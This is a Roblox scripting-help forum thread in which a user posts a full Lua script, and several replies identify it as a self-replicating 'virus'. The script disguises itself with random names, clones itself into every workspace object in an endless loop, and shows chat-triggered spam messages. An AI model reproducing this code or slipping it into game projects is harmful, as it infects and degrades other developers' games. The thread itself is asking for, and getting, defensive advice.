generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Re: What does this script do?

Previous Thread :: Next Thread 
TheBluePickles is not online. TheBluePickles
Joined: 16 Aug 2014
Total Posts: 2942
28 Oct 2014 06:37 PM
names={"Buddyguy22", "Wicked1234", "", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
local NameCheck = false
script.Parent.Name = names[math.random(1, #names)]
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
local c = script.Parent:Clone()

function addEvent(ch)
wait(math.random())
NameCheck = false
for ss = 1, #names do
if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = ch
cloak.Name = names[math.random(1, 5)]
end
end

workspace.ChildAdded:connect(addEvent)

game.Players.PlayerAdded:connect(function(pl)
pl.Chatted:connect(function(m)
if m:sub(1, 5) == "/sc t" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "THEY CALL ME CRAZY"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "GOTTA GOTTA BE CRAZY"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "GOTTA GET A LIFE (YOU)"
wait(3)
m:remove()
end
if m:sub(1, 5) == "HAAXX" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "HAAXX"
wait(3)
m:remove()
end
end)
end)

while true do
local s = workspace:GetChildren()
for i = 1, #s do
NameCheck = false
for ss = 1, #names do
if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = s[i]
end
wait(0.1)
end
wait(1)
end
Report Abuse
iondriver is not online. iondriver
Joined: 18 Nov 2012
Total Posts: 757
28 Oct 2014 06:38 PM
It is a virus. Delete immediately.
Report Abuse
RoflBread is not online. RoflBread
Joined: 18 Jun 2009
Total Posts: 3803
28 Oct 2014 06:43 PM
But hey it sings an awesome song!
Report Abuse
plattywatwat123 is not online. plattywatwat123
Joined: 06 May 2013
Total Posts: 219
28 Oct 2014 06:51 PM
I saw clone, loop, and text in there. Don't trust him.
Its a virus.
Report Abuse
gooey333 is not online. gooey333
Joined: 24 Mar 2013
Total Posts: 1208
29 Oct 2014 12:24 AM
Ive seen this script before and its a virus.
Report Abuse
ScriptingIlluminati is not online. ScriptingIlluminati
Joined: 27 Oct 2014
Total Posts: 25
29 Oct 2014 01:35 AM
The script consists of a scripter singing u a song, and a bunch of game destroying codes...which is technically a virus..
Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image